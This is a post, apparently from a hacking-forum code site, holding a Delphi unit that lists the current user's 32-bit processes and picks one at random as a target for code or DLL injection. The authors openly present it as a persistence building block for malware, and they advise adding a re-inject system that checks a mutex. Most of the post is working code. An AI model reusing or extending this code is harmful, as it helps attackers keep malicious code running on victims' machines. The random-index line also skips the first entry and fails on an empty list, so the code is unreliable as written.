uGetProcess - Retrieve Injectable 32-bit Process

posted 26 Nov 2011, 10:15 by Delphi Basics
This Unit is Made by Snify and MindfreaK together.
We went bored and searched for an x64 persistence method.
U can easily write your own x64 persistence with this , 
just write ur persistence dll or codeinjection and inject it
into an process u have found with GetInjectAbleProcess.

WARNING: Remember, the Process is chosen randomly and could be terminated
by itself , so u need an re-inject system which checks for an running
persistence module/dll/codeinjection. ( TIPP: Communicate via Mutex )

{
     This Unit is Made by Snify and MindfreaK together.
We went bored and searched for an x64 persistence method.
U can easily write your own x64 persistence with this , 
just write ur persistence dll or codeinjection and inject it
into an process u have found with GetInjectAbleProcess.
 
WARNING: Remember, the Process is chosen randomly and could be terminated
by itself , so u need an re-inject system which checks for an running
persistence module/dll/codeinjection. ( TIPP: Communicate via Mutex )
      
     - OpenSC.WS -
 
}
unit uGetProcess;

interface

uses SysUtils,TlHelp32,Windows;

function GetInjectAbleProcess() : Integer;

implementation

  type
  PTOKEN_USER = ^TOKEN_USER;
  _TOKEN_USER = record
    User: TSidAndAttributes;
  end;
  TOKEN_USER = _TOKEN_USER; 

function GetUserAndDomainFromPID(ProcessId: DWORD;
  var User, Domain: string): Boolean;
var
  hToken: THandle;
  cbBuf: Cardinal;
  ptiUser: PTOKEN_USER;
  snu: SID_NAME_USE;
  ProcessHandle: THandle;
  UserSize, DomainSize: DWORD;
  bSuccess: Boolean;
begin
  Result := False;
  ProcessHandle := OpenProcess(PROCESS_QUERY_INFORMATION, False, ProcessId);
  if ProcessHandle <> 0 then
  begin
  //  EnableProcessPrivilege(ProcessHandle, 'SeSecurityPrivilege', True);
    if OpenProcessToken(ProcessHandle, TOKEN_QUERY, hToken) then
    begin
      bSuccess := GetTokenInformation(hToken, TokenUser, nil, 0, cbBuf);
      ptiUser  := nil;
      while (not bSuccess) and (GetLastError = ERROR_INSUFFICIENT_BUFFER) do
      begin
        ReallocMem(ptiUser, cbBuf);
        bSuccess := GetTokenInformation(hToken, TokenUser, ptiUser, cbBuf, cbBuf);
      end;
      CloseHandle(hToken);

      if not bSuccess then
      begin
        Exit;
      end;

      UserSize := 0;
      DomainSize := 0;
      LookupAccountSid(nil, ptiUser.User.Sid, nil, UserSize, nil, DomainSize, snu);
      if (UserSize <> 0) and (DomainSize <> 0) then
      begin
        SetLength(User, UserSize);
        SetLength(Domain, DomainSize);
        if LookupAccountSid(nil, ptiUser.User.Sid, PChar(User), UserSize,
          PChar(Domain), DomainSize, snu) then
        begin
          Result := True;
          User := StrPas(PChar(User));
          Domain := StrPas(PChar(Domain));
        end;
      end;

      if bSuccess then
      begin
        FreeMem(ptiUser);
      end;
    end;
    CloseHandle(ProcessHandle);
  end;
end;


function IsWOW64: Boolean;
type
  TIsWow64Process = function(Handle: THandle;var Res: BOOL): BOOL; stdcall;
var
  IsWow64Result: BOOL;
  IsWow64Process: TIsWow64Process;
begin
  IsWow64Process := GetProcAddress(
    GetModuleHandle('kernel32'), 'IsWow64Process'
  );
  if Assigned(IsWow64Process) then
  begin
    IsWow64Process(GetCurrentProcess, IsWow64Result);
    Result := IsWow64Result;
  end
  else
    Result := False;
end;

Function GetUserFromWindows: string;
Var
   UserName : string;
   UserNameLen : Dword;
Begin
   UserNameLen := 255;
   SetLength(userName, UserNameLen) ;
   If GetUserName(PChar(UserName), UserNameLen) Then
     Result := Copy(UserName,1,UserNameLen - 1)
   Else
     Result := 'Unknown';
End;

function GetInjectAbleProcess() : Integer;    // 32 bit only
var
bProcess: boolean;
hProcess: THandle;
pe32Structur:  TProcessEntry32;
sUser: string;
sDomain: string;
sWindowsUser: string;
TIsWow64Process : function( Handle: Windows.THandle; var Res: Windows.BOOL): Windows.BOOL; stdcall;
hOpen: THandle;
bIsWOW64: BOOL;
bError: boolean;
array_PID : array of integer;
pidcounter : Integer;
begin
pidcounter := 0;


   sWindowsUser := GetUserFromWindows;
   pe32Structur.dwSize:=Sizeof(TProcessEntry32);
   hProcess :=CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);

   If IsWow64 = true then
   begin

          TIsWow64Process := GetProcAddress(GetModuleHandle('kernel32'), 'IsWow64Process');
          if Assigned(TIsWow64Process) then
          begin
           // Writeln ( 'API geladen.' )
          end;
   end;


   if Process32first(hProcess,pe32structur) then
   begin
     //Writeln ( IntToStr (pe32Structur.th32ProcessID) );
     repeat bProcess:=Process32Next(hProcess,pe32structur);
        if GetCurrentProcessID <> pe32Structur.th32ProcessID then
        begin
           bError := false;
           if bProcess = true then
           begin
             GetUserAndDomainFromPID(pe32Structur.th32ProcessID,sUser, sDomain);
             if sWindowsUser = sUser then
             begin
               if IsWOW64 = true then   //wenn 64
               begin
                 //Writeln ('OpenProcess: '+IntToStr(pe32Structur.th32ProcessID));
                 hOpen :=  Windows.OpenProcess ( PROCESS_QUERY_INFORMATION , false , pe32Structur.th32ProcessID );
                 if hOpen = 0  then
                 begin
                   //Writeln ('OpenProcess gescheitert.');
                   bError := true;
                 end;

                 if bError = false then
                 begin


                TIsWow64Process ( hOpen , bIsWOW64 );
                CloseHandle ( hOpen );


                if  bIsWOW64 = false  then
                begin
                //  Writeln ( '64Bit: '+IntToStr(pe32Structur.th32ProcessID) )
                end;

                if  bIsWOW64 = true  then
                begin
                  //Writeln ( {'32Bit: '+}IntToStr(pe32Structur.th32ProcessID) );
                  SetLength(array_PID, pidcounter+1);
                  array_PID[pidcounter] := pe32Structur.th32ProcessID;
                  inc(pidcounter);
                end;
                 end;
               end;


               if ISWOW64 = false then    //Wenn 32
               begin
                  //Writeln (  IntToStr (pe32Structur.th32ProcessID) );
                  SetLength(array_PID, pidcounter+1);
                  array_PID[pidcounter] := pe32Structur.th32ProcessID;
                  inc(pidcounter);
               end;
             end;
           end;
        end;
     until not bProcess;
   end;
   CloseHandle ( hProcess );

   {$IFDEF Debug}
   for pidcounter := 0 to Length(array_PID) -1 do begin
       writeln ('INDEX['+inttostr(pidcounter)+']  ' + inttostr(array_PID[pidcounter]));
   end;
   {$ENDIF}

   randomize;
   result := array_PID[1 + random (Length(array_PID)-1)];


end;

end.
Comments